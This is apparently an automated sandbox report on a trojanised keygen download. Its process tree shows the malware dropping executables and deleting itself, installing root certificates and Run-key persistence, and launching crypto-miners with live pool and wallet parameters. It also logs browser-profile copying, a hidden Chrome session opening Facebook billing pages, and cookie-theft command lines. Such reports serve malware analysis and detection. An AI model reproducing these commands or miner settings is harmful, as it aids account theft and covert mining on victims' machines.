                                                                                                                              • Modifies registry class
                                                                                                                              PID:2556
                                                                                                                            • c:\windows\system32\svchost.exe
                                                                                                                              c:\windows\system32\svchost.exe -k netsvcs -s LanmanServer
                                                                                                                              1⤵
                                                                                                                              • Suspicious use of AdjustPrivilegeToken
                                                                                                                              PID:2376
                                                                                                                            • c:\windows\system32\svchost.exe
                                                                                                                              c:\windows\system32\svchost.exe -k netsvcs -s IKEEXT
                                                                                                                              1⤵
                                                                                                                                PID:2336
                                                                                                                              • c:\windows\system32\svchost.exe
                                                                                                                                c:\windows\system32\svchost.exe -k netsvcs -s ShellHWDetection
                                                                                                                                1⤵
                                                                                                                                  PID:1944
                                                                                                                                • c:\windows\system32\svchost.exe
                                                                                                                                  c:\windows\system32\svchost.exe -k netsvcs -s UserManager
                                                                                                                                  1⤵
                                                                                                                                    PID:1216
                                                                                                                                  • \??\c:\windows\system32\svchost.exe
                                                                                                                                    c:\windows\system32\svchost.exe -k netsvcs -s BITS
                                                                                                                                    1⤵
                                                                                                                                    • Suspicious use of SetThreadContext
                                                                                                                                    • Modifies registry class
                                                                                                                                    • Suspicious behavior: EnumeratesProcesses
                                                                                                                                    • Suspicious use of AdjustPrivilegeToken
                                                                                                                                    PID:3188
                                                                                                                                    • C:\Windows\system32\svchost.exe
                                                                                                                                      C:\Windows\system32\svchost.exe -k SystemNetworkService
                                                                                                                                      2⤵
                                                                                                                                      • Drops file in System32 directory
                                                                                                                                      • Checks processor information in registry
                                                                                                                                      • Modifies data under HKEY_USERS
                                                                                                                                      • Modifies registry class
                                                                                                                                      PID:4236
                                                                                                                                  • C:\Windows\System32\rundll32.exe
                                                                                                                                    C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
                                                                                                                                    1⤵
                                                                                                                                      PID:5988
                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\Temp2_Delphi_Cars_2014_r2_2_14_2_keygen_by_KeygenNinja.zip\Delphi_Cars_2014_r2_2_14_2_keygen_by_KeygenNinja.exe
                                                                                                                                      "C:\Users\Admin\AppData\Local\Temp\Temp2_Delphi_Cars_2014_r2_2_14_2_keygen_by_KeygenNinja.zip\Delphi_Cars_2014_r2_2_14_2_keygen_by_KeygenNinja.exe"
                                                                                                                                      1⤵
                                                                                                                                        PID:6096
                                                                                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                          C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen.bat" "
                                                                                                                                          2⤵
                                                                                                                                            PID:5184
                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-pr.exe
                                                                                                                                              keygen-pr.exe -p83fsase3Ge
                                                                                                                                              3⤵
                                                                                                                                              • Executes dropped EXE
                                                                                                                                              PID:4472
                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\RarSFX1\key.exe
                                                                                                                                                "C:\Users\Admin\AppData\Local\Temp\RarSFX1\key.exe"
                                                                                                                                                4⤵
                                                                                                                                                • Executes dropped EXE
                                                                                                                                                PID:5328
                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\RarSFX1\key.exe
                                                                                                                                                  C:\Users\Admin\AppData\Local\Temp\RarSFX1\key.exe -txt -scanlocal -file:potato.dat
                                                                                                                                                  5⤵
                                                                                                                                                    PID:4380
                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-1.exe
                                                                                                                                                keygen-step-1.exe
                                                                                                                                                3⤵
                                                                                                                                                • Executes dropped EXE
                                                                                                                                                PID:4728
                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-2.exe
                                                                                                                                                keygen-step-2.exe
                                                                                                                                                3⤵
                                                                                                                                                • Executes dropped EXE
                                                                                                                                                • Modifies system certificate store
                                                                                                                                                PID:4480
                                                                                                                                                • C:\Users\Admin\AppData\Roaming\B20B.tmp.exe
                                                                                                                                                  "C:\Users\Admin\AppData\Roaming\B20B.tmp.exe"
                                                                                                                                                  4⤵
                                                                                                                                                  • Executes dropped EXE
                                                                                                                                                  • Loads dropped DLL
                                                                                                                                                  PID:2168
                                                                                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                    cmd.exe /C timeout /T 10 /NOBREAK > Nul & Del /f /q "C:\Users\Admin\AppData\Roaming\B20B.tmp.exe"
                                                                                                                                                    5⤵
                                                                                                                                                      PID:3964
                                                                                                                                                      • C:\Windows\SysWOW64\timeout.exe
                                                                                                                                                        timeout /T 10 /NOBREAK
                                                                                                                                                        6⤵
                                                                                                                                                        • Delays execution with timeout.exe
                                                                                                                                                        PID:852
                                                                                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                    "C:\Windows\system32\cmd.exe" /c ping 127.0.0.1 && del "C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-2.exe" >> NUL
                                                                                                                                                    4⤵
                                                                                                                                                      PID:5512
                                                                                                                                                      • C:\Windows\SysWOW64\PING.EXE
                                                                                                                                                        ping 127.0.0.1
                                                                                                                                                        5⤵
                                                                                                                                                        • Runs ping.exe
                                                                                                                                                        PID:5284
                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-3.exe
                                                                                                                                                    keygen-step-3.exe
                                                                                                                                                    3⤵
                                                                                                                                                    • Executes dropped EXE
                                                                                                                                                    PID:4440
                                                                                                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                      cmd.exe /C ping 1.1.1.1 -n 1 -w 3000 > Nul & Del /f /q "C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-3.exe"
                                                                                                                                                      4⤵
                                                                                                                                                        PID:5612
                                                                                                                                                        • C:\Windows\SysWOW64\PING.EXE
                                                                                                                                                          ping 1.1.1.1 -n 1 -w 3000
                                                                                                                                                          5⤵
                                                                                                                                                          • Runs ping.exe
                                                                                                                                                          PID:3792
                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-4.exe
                                                                                                                                                      keygen-step-4.exe
                                                                                                                                                      3⤵
                                                                                                                                                      • Executes dropped EXE
                                                                                                                                                      PID:4904
                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\RarSFX2\qiangli-game.exe
                                                                                                                                                        "C:\Users\Admin\AppData\Local\Temp\RarSFX2\qiangli-game.exe"
                                                                                                                                                        4⤵
                                                                                                                                                        • Executes dropped EXE
                                                                                                                                                        • Drops file in Program Files directory
                                                                                                                                                        • Suspicious use of SetWindowsHookEx
                                                                                                                                                        PID:4792
                                                                                                                                                        • C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                          "C:\Windows\System32\rundll32.exe" "C:\Program Files\pdfsetup.dll",install
                                                                                                                                                          5⤵
                                                                                                                                                          • Loads dropped DLL
                                                                                                                                                          • Modifies registry class
                                                                                                                                                          • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                          • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                          PID:5156
                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\RarSFX2\file.exe
                                                                                                                                                        "C:\Users\Admin\AppData\Local\Temp\RarSFX2\file.exe"
                                                                                                                                                        4⤵
                                                                                                                                                        • Executes dropped EXE
                                                                                                                                                        • Modifies data under HKEY_USERS
                                                                                                                                                        • Modifies system certificate store
                                                                                                                                                        • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                        • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                        PID:5172
                                                                                                                                                        • C:\Users\Admin\AppData\Roaming\BB04.tmp.exe
                                                                                                                                                          "C:\Users\Admin\AppData\Roaming\BB04.tmp.exe"
                                                                                                                                                          5⤵
                                                                                                                                                          • Executes dropped EXE
                                                                                                                                                          • Suspicious use of SetThreadContext
                                                                                                                                                          PID:5420
                                                                                                                                                          • C:\Users\Admin\AppData\Roaming\BB04.tmp.exe
                                                                                                                                                            "C:\Users\Admin\AppData\Roaming\BB04.tmp.exe"
                                                                                                                                                            6⤵
                                                                                                                                                            • Executes dropped EXE
                                                                                                                                                            • Checks processor information in registry
                                                                                                                                                            • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                            PID:4664
                                                                                                                                                        • C:\Users\Admin\AppData\Roaming\BDA5.tmp.exe
                                                                                                                                                          "C:\Users\Admin\AppData\Roaming\BDA5.tmp.exe"
                                                                                                                                                          5⤵
                                                                                                                                                          • Executes dropped EXE
                                                                                                                                                          • Adds Run key to start application
                                                                                                                                                          • Suspicious use of SetThreadContext
                                                                                                                                                          PID:5464
                                                                                                                                                          • C:\Windows\system32\msiexec.exe
                                                                                                                                                            -o pool.supportxmr.com:8080 -u 47wDrszce6VbnMB4zhhEA1Gr3EzwHx2eS6QzC5sFoq8iGdMjnzX8bnEjBdQHsAuW8C1SNgxyGa4DQTVnQ9jfhRod73np5P8.w28230 --cpu-max-threads-hint 50 -r 9999
                                                                                                                                                            6⤵
                                                                                                                                                            • Blocklisted process makes network request
                                                                                                                                                            • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                            PID:5676
                                                                                                                                                          • C:\Windows\system32\msiexec.exe
                                                                                                                                                            -P stratum1+ssl://0xb7633a80145Ec9ce2b8b5F80AB36C783064C2E10.w18519@eu-eth.hiveon.net:24443 -R --response-timeout 30 --farm-retries 99999
                                                                                                                                                            6⤵
                                                                                                                                                              PID:932
                                                                                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                            "C:\Windows\system32\cmd.exe" /c ping 127.0.0.1 && del "C:\Users\Admin\AppData\Local\Temp\RarSFX2\file.exe"
                                                                                                                                                            5⤵
                                                                                                                                                              PID:5836
                                                                                                                                                              • C:\Windows\SysWOW64\PING.EXE
                                                                                                                                                                ping 127.0.0.1
                                                                                                                                                                6⤵
                                                                                                                                                                • Runs ping.exe
                                                                                                                                                                PID:5888
                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\RarSFX2\askinstall20.exe
                                                                                                                                                            "C:\Users\Admin\AppData\Local\Temp\RarSFX2\askinstall20.exe"
                                                                                                                                                            4⤵
                                                                                                                                                            • Executes dropped EXE
                                                                                                                                                            • Drops Chrome extension
                                                                                                                                                            • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                            PID:5776
                                                                                                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                              cmd.exe /c taskkill /f /im chrome.exe
                                                                                                                                                              5⤵
                                                                                                                                                                PID:6000
                                                                                                                                                                • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                                                  taskkill /f /im chrome.exe
                                                                                                                                                                  6⤵
                                                                                                                                                                  • Kills process with taskkill
                                                                                                                                                                  • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                  PID:5904
                                                                                                                                                              • C:\Windows\SysWOW64\xcopy.exe
                                                                                                                                                                xcopy "C:\Users\Admin\AppData\Local\Google\Chrome\User Data" "C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99\" /s /e /y
                                                                                                                                                                5⤵
                                                                                                                                                                • Enumerates system info in registry
                                                                                                                                                                PID:3548
                                                                                                                                                              • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                "C:\Program Files\Google\Chrome\Application\chrome.exe" --window-position=-50000,-50000 --user-data-dir="C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99" https://www.facebook.com/ https://www.facebook.com/pages/ https://secure.facebook.com/ads/manager/account_settings/account_billing/
                                                                                                                                                                5⤵
                                                                                                                                                                • Enumerates system info in registry
                                                                                                                                                                • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                                • Suspicious use of FindShellTrayWindow
                                                                                                                                                                PID:4896
                                                                                                                                                                • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler --user-data-dir=C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99 /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler --database=C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99\Crashpad --metrics-dir=C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99 --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=89.0.4389.114 --initial-client-data=0xd4,0xd8,0xdc,0xb0,0xe0,0x7ffbc5314f50,0x7ffbc5314f60,0x7ffbc5314f70
                                                                                                                                                                  6⤵
                                                                                                                                                                    PID:5244
                                                                                                                                                                  • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1724,16376051271681861936,11452912339897637386,131072 --lang=en-US --service-sandbox-type=utility --user-data-dir="C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99" --mojo-platform-channel-handle=2296 /prefetch:8
                                                                                                                                                                    6⤵
                                                                                                                                                                      PID:4600
                                                                                                                                                                    • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1724,16376051271681861936,11452912339897637386,131072 --lang=en-US --service-sandbox-type=network --user-data-dir="C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99" --mojo-platform-channel-handle=1784 /prefetch:8
                                                                                                                                                                      6⤵
                                                                                                                                                                      • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                                      PID:4740
                                                                                                                                                                    • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --field-trial-handle=1724,16376051271681861936,11452912339897637386,131072 --user-data-dir="C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99" --gpu-preferences=SAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=1736 /prefetch:2
                                                                                                                                                                      6⤵
                                                                                                                                                                        PID:4852
                                                                                                                                                                      • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1724,16376051271681861936,11452912339897637386,131072 --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99" --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2844 /prefetch:1
                                                                                                                                                                        6⤵
                                                                                                                                                                          PID:5164
                                                                                                                                                                        • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1724,16376051271681861936,11452912339897637386,131072 --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99" --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2828 /prefetch:1
                                                                                                                                                                          6⤵
                                                                                                                                                                            PID:4980
                                                                                                                                                                          • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                            "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1724,16376051271681861936,11452912339897637386,131072 --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99" --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3344 /prefetch:1
                                                                                                                                                                            6⤵
                                                                                                                                                                              PID:5396
                                                                                                                                                                            • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                              "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1724,16376051271681861936,11452912339897637386,131072 --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99" --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3216 /prefetch:1
                                                                                                                                                                              6⤵
                                                                                                                                                                                PID:5068
                                                                                                                                                                              • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1724,16376051271681861936,11452912339897637386,131072 --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99" --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=4 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3640 /prefetch:1
                                                                                                                                                                                6⤵
                                                                                                                                                                                  PID:3120
                                                                                                                                                                                • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1724,16376051271681861936,11452912339897637386,131072 --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99" --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3972 /prefetch:1
                                                                                                                                                                                  6⤵
                                                                                                                                                                                    PID:5568
                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\RarSFX2\md4_4igk.exe
                                                                                                                                                                                "C:\Users\Admin\AppData\Local\Temp\RarSFX2\md4_4igk.exe"
                                                                                                                                                                                4⤵
                                                                                                                                                                                • Executes dropped EXE
                                                                                                                                                                                • Checks whether UAC is enabled
                                                                                                                                                                                PID:5268
                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\RarSFX2\BTRSetp.exe
                                                                                                                                                                                "C:\Users\Admin\AppData\Local\Temp\RarSFX2\BTRSetp.exe"
                                                                                                                                                                                4⤵
                                                                                                                                                                                • Executes dropped EXE
                                                                                                                                                                                PID:1068
                                                                                                                                                                                • C:\ProgramData\1476751.exe
                                                                                                                                                                                  "C:\ProgramData\1476751.exe"
                                                                                                                                                                                  5⤵
                                                                                                                                                                                  • Executes dropped EXE
                                                                                                                                                                                  • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                                                  PID:2724
                                                                                                                                                                                • C:\ProgramData\2418326.exe
                                                                                                                                                                                  "C:\ProgramData\2418326.exe"
                                                                                                                                                                                  5⤵
                                                                                                                                                                                  • Executes dropped EXE
                                                                                                                                                                                  • Adds Run key to start application
                                                                                                                                                                                  PID:3516
                                                                                                                                                                                  • C:\ProgramData\Windows Host\Windows Host.exe
                                                                                                                                                                                    "C:\ProgramData\Windows Host\Windows Host.exe"
                                                                                                                                                                                    6⤵
                                                                                                                                                                                    • Executes dropped EXE
                                                                                                                                                                                    PID:4608
                                                                                                                                                                                • C:\ProgramData\8029415.exe
                                                                                                                                                                                  "C:\ProgramData\8029415.exe"
                                                                                                                                                                                  5⤵
                                                                                                                                                                                  • Executes dropped EXE
                                                                                                                                                                                  • Suspicious use of SetThreadContext
                                                                                                                                                                                  • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                                                  PID:4516
                                                                                                                                                                                  • C:\ProgramData\8029415.exe
                                                                                                                                                                                    "{path}"
                                                                                                                                                                                    6⤵
                                                                                                                                                                                    • Executes dropped EXE
                                                                                                                                                                                    PID:5352
                                                                                                                                                                                  • C:\ProgramData\8029415.exe
                                                                                                                                                                                    "{path}"
                                                                                                                                                                                    6⤵
                                                                                                                                                                                    • Executes dropped EXE
                                                                                                                                                                                    • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                                                    PID:5452
                                                                                                                                                                                • C:\ProgramData\3958151.exe
                                                                                                                                                                                  "C:\ProgramData\3958151.exe"
                                                                                                                                                                                  5⤵
                                                                                                                                                                                  • Executes dropped EXE
                                                                                                                                                                                  • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                                                  PID:1516
                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\RarSFX2\gcttt.exe
                                                                                                                                                                                "C:\Users\Admin\AppData\Local\Temp\RarSFX2\gcttt.exe"
                                                                                                                                                                                4⤵
                                                                                                                                                                                • Executes dropped EXE
                                                                                                                                                                                • Adds Run key to start application
                                                                                                                                                                                PID:5664
                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                                                                                                                                                  C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                                                                                                                  5⤵
                                                                                                                                                                                  • Executes dropped EXE
                                                                                                                                                                                  PID:6024
                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                                                                                                                                                  C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                                                                                                                  5⤵
                                                                                                                                                                                  • Executes dropped EXE
                                                                                                                                                                                  • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                                                  PID:4480
                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                                                                                                                                                  C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                                                                                                                  5⤵
                                                                                                                                                                                  • Executes dropped EXE
                                                                                                                                                                                  • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                                                  PID:504
                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                                                                                                                                                  C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                                                                                                                  5⤵
                                                                                                                                                                                  • Executes dropped EXE
                                                                                                                                                                                  • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                                                  PID:4460

                                                                                                                                                                        Network

                                                                                                                                                                        MITRE ATT&CK Matrix ATT&CK v6

                                                                                                                                                                        Persistence

                                                                                                                                                                        Registry Run Keys / Startup Folder

                                                                                                                                                                        1
                                                                                                                                                                        T1060

                                                                                                                                                                        Defense Evasion

                                                                                                                                                                        Modify Registry

                                                                                                                                                                        2
                                                                                                                                                                        T1112

                                                                                                                                                                        Install Root Certificate

                                                                                                                                                                        1
                                                                                                                                                                        T1130

                                                                                                                                                                        Credential Access

                                                                                                                                                                        Credentials in Files

                                                                                                                                                                        4
                                                                                                                                                                        T1081

                                                                                                                                                                        Discovery

                                                                                                                                                                        Query Registry

                                                                                                                                                                        3
                                                                                                                                                                        T1012

                                                                                                                                                                        System Information Discovery

                                                                                                                                                                        4
                                                                                                                                                                        T1082

                                                                                                                                                                        Remote System Discovery

                                                                                                                                                                        1
                                                                                                                                                                        T1018

                                                                                                                                                                        Collection

                                                                                                                                                                        Data from Local System

                                                                                                                                                                        4
                                                                                                                                                                        T1005

                                                                                                                                                                        Command and Control

                                                                                                                                                                        Web Service

                                                                                                                                                                        1
                                                                                                                                                                        T1102

                                                                                                                                                                        Replay Monitor

                                                                                                                                                                        Loading Replay Monitor...

                                                                                                                                                                        Downloads

                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad\settings.dat
                                                                                                                                                                          MD5

                                                                                                                                                                          04c546186b45fa182220ef85167b24aa

                                                                                                                                                                          SHA1

                                                                                                                                                                          74238e7368a23111136079b6580ead79721e1a82

                                                                                                                                                                          SHA256

                                                                                                                                                                          da399e8a4a0945742a8dc96c851a0f2fa944f2874fd517e261a575db0c04044b

                                                                                                                                                                          SHA512

                                                                                                                                                                          f56ddb99d98bc33563ca44604e679f5e70ad3eb31abfea6195533906bea9884e08e476af03f59bf05b9d07ef4f4a735e1481c5d051317cea583769ae463edfbe

                                                                                                                                                                        • \??\pipe\crashpad_4084_YQRMLZPOOFDHKCYJ
                                                                                                                                                                          MD5

                                                                                                                                                                          d41d8cd98f00b204e9800998ecf8427e

                                                                                                                                                                          SHA1

                                                                                                                                                                          da39a3ee5e6b4b0d3255bfef95601890afd80709

                                                                                                                                                                          SHA256

                                                                                                                                                                          e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855

                                                                                                                                                                          SHA512

                                                                                                                                                                          cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

                                                                                                                                                                        • memory/284-254-0x000001E9D2720000-0x000001E9D2787000-memory.dmp
                                                                                                                                                                          Filesize

                                                                                                                                                                          412KB

                                                                                                                                                                        • memory/576-116-0x0000000000000000-mapping.dmp
                                                                                                                                                                        • memory/932-281-0x0000000140000000-0x0000000140383000-memory.dmp
                                                                                                                                                                          Filesize

                                                                                                                                                                          3MB

                                                                                                                                                                        • memory/936-302-0x000001FCFD6B0000-0x000001FCFD717000-memory.dmp
                                                                                                                                                                          Filesize

                                                                                                                                                                          412KB

                                                                                                                                                                        • memory/936-262-0x000001FCFCFD0000-0x000001FCFD037000-memory.dmp
                                                                                                                                                                          Filesize

                                                                                                                                                                          412KB

                                                                                                                                                                        • memory/1068-284-0x000000001C420000-0x000000001C422000-memory.dmp
                                                                                                                                                                          Filesize

                                                                                                                                                                          8KB

                                                                                                                                                                        • memory/1100-260-0x0000022791B30000-0x0000022791B97000-memory.dmp
                                                                                                                                                                          Filesize

                                                                                                                                                                          412KB

                                                                                                                                                                        • memory/1100-300-0x0000022791C10000-0x0000022791C77000-memory.dmp
                                                                                                                                                                          Filesize

                                                                                                                                                                          412KB

                                                                                                                                                                        • memory/1136-222-0x0000000000000000-mapping.dmp
                                                                                                                                                                        • memory/1192-152-0x0000000000000000-mapping.dmp
                                                                                                                                                                        • memory/1216-270-0x00000219A3B00000-0x00000219A3B67000-memory.dmp
                                                                                                                                                                          Filesize

                                                                                                                                                                          412KB

                                                                                                                                                                        • memory/1256-268-0x000001CB5A8D0000-0x000001CB5A937000-memory.dmp
                                                                                                                                                                          Filesize

                                                                                                                                                                          412KB

                                                                                                                                                                        • memory/1408-264-0x000002490C840000-0x000002490C8A7000-memory.dmp
                                                                                                                                                                          Filesize

                                                                                                                                                                          412KB

                                                                                                                                                                        • memory/1408-304-0x000002490C8B0000-0x000002490C917000-memory.dmp
                                                                                                                                                                          Filesize

                                                                                                                                                                          412KB

                                                                                                                                                                        • memory/1516-290-0x00000000059C0000-0x00000000059C1000-memory.dmp
                                                                                                                                                                          Filesize

                                                                                                                                                                          4KB

                                                                                                                                                                        • memory/1944-306-0x0000021E27040000-0x0000021E270A7000-memory.dmp
                                                                                                                                                                          Filesize

                                                                                                                                                                          412KB

                                                                                                                                                                        • memory/1944-266-0x0000021E26FD0000-0x0000021E27037000-memory.dmp
                                                                                                                                                                          Filesize

                                                                                                                                                                          412KB

                                                                                                                                                                        • memory/2168-275-0x00000000058D0000-0x0000000005961000-memory.dmp
                                                                                                                                                                          Filesize

                                                                                                                                                                          580KB

                                                                                                                                                                        • memory/2168-276-0x0000000000400000-0x0000000003DE5000-memory.dmp
                                                                                                                                                                          Filesize

                                                                                                                                                                          57MB

                                                                                                                                                                        • memory/2228-225-0x0000000000000000-mapping.dmp
                                                                                                                                                                        • memory/2336-296-0x0000022D32400000-0x0000022D32467000-memory.dmp
                                                                                                                                                                          Filesize

                                                                                                                                                                          412KB

                                                                                                                                                                        • memory/2336-256-0x0000022D32210000-0x0000022D32277000-memory.dmp
                                                                                                                                                                          Filesize

                                                                                                                                                                          412KB

                                                                                                                                                                        • memory/2376-298-0x0000028914990000-0x00000289149F7000-memory.dmp
                                                                                                                                                                          Filesize

                                                                                                                                                                          412KB

                                                                                                                                                                        • memory/2376-258-0x0000028914880000-0x00000289148E7000-memory.dmp
                                                                                                                                                                          Filesize

                                                                                                                                                                          412KB

                                                                                                                                                                        • memory/2556-250-0x000001833F0D0000-0x000001833F137000-memory.dmp
                                                                                                                                                                          Filesize

                                                                                                                                                                          412KB

                                                                                                                                                                        • memory/2556-294-0x000001833F190000-0x000001833F1F7000-memory.dmp
                                                                                                                                                                          Filesize

                                                                                                                                                                          412KB

                                                                                                                                                                        • memory/2600-147-0x0000000000000000-mapping.dmp
                                                                                                                                                                        • memory/2636-272-0x000002BC90080000-0x000002BC900E7000-memory.dmp
                                                                                                                                                                          Filesize

                                                                                                                                                                          412KB

                                                                                                                                                                        • memory/2660-274-0x000001D1896C0000-0x000001D189727000-memory.dmp
                                                                                                                                                                          Filesize

                                                                                                                                                                          412KB

                                                                                                                                                                        • memory/2676-160-0x0000000000000000-mapping.dmp
                                                                                                                                                                        • memory/2680-132-0x0000000000000000-mapping.dmp
                                                                                                                                                                        • memory/2724-285-0x0000000005490000-0x0000000005491000-memory.dmp
                                                                                                                                                                          Filesize

                                                                                                                                                                          4KB

                                                                                                                                                                        • memory/2988-125-0x00007FFBCD9D0000-0x00007FFBCD9D1000-memory.dmp
                                                                                                                                                                          Filesize

                                                                                                                                                                          4KB

                                                                                                                                                                        • memory/2988-121-0x0000000000000000-mapping.dmp
                                                                                                                                                                        • memory/3020-122-0x0000000000000000-mapping.dmp
